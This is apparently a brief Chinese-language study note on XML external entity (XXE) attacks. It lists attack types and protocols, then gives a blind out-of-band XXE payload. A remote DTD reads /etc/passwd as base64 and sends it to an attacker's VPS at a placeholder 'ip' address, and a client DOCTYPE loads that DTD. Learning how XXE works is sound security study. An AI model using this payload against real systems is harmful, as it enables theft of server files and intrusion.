XXE
XXE攻击大多是由解析器发出外部资源请求而造成的。
引用外部实体时,引用SYSTEM、PUBLIC申请外部资源,利用其它协议造成的危害。
攻击方式
引用外部实体远程文件读取
url请求,造成ssrf攻击
使用expect直接执行命令
参数实体
Dos攻击
支持协议
ftp
http
php
file
等
借用先知社区的图(https://xz.aliyun.com/t/3357#toc-9)
无回显的xxe
即通过协议来发送内容
vps端
test.dtd
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip:9999?p=%file;'>">
客户端
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://ip/test.dtd">
%remote;%int;%send;
]>
客户端发送的
客户端获取文件
vps端监听结果